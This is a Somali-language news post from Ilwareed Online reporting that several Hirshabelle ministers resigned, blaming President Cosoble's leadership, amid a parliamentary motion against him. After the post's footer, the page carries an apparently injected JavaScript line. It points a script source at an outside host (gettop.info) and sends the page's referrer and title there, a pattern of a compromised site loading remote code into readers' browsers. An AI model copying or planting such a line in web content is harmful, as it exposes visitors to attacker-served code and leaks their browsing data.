Wasiiro ka tirsan Maamulka Hirshabelle oo is casilay

Ilwareed Online

Wasiiro ka tirsan Maamulka Hirshabelle, ayaa lagu soo waramayaa inay iska casileen xilkii ay ka hayeen Maamulka Hirshabelle, kadib markii ay sheegeen in Madaxweyne Cosoble uu ku fashilmay u shaqeynta Maamulka Hirshabelle.

Wasiirada iscasilay, ayaa sheegay Madaxweynaha Hirshabelle inuu ku fashilmay hoggaaminta Maamulkaasi sidaasi awgeedna ay go’aansadeen inay iska casilaan xilalkii ay hayeen.

Wasiirada xilalkaan iska casilay, ayaa waxa ay kala yihiin, Wasiiro, Wasiiro Ku xigeeno iyo Wasiiru Dowlayaal, sida ay soo sheegayaan Suxufiyiinta ku sugan Magaalada Jowhar.

Wasiirkii Wasaaradda Boostada Isgaarsiinta Hirshabelle, Wasiir ku xigeenkii Haweenka, Wasiirkii Ku xigeenkii Bii’ada Hirshabelle iyo Wasiiro kale ayaa la xaqiijiyay inay iscasileen.

Arintaan ayaa timid, iyadoo Madaxweyne Cali Cabdulaahi Cosoble, ay jiraan Mooshin culus oo laga wado, taasi oo ay saxiixeen Xildhibaano badan oo ka tirsan Hirshabelle.

Sidoo kale warar soo baxaya ayaa sheegaya in Xildhibaano ka tirsan Baarlamaanka Hirshabelle ay gudbiyeen Mooshinka ka dhanka ah Madaxweyne Cosoble oo gacanta loo galiyay Gudoonka Baarlamaanka Hirshabelle.

Mogadishu – Somalia

Wixii warbixin ah waxaad noogu soo diri kartaa email: ilwareednet@gmail.com
fadlan like saar boggeena facebook : @ilwareedonline

The post Wasiiro ka tirsan Maamulka Hirshabelle oo is casilay appeared first on Ilwareed Online.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

You might also like More from author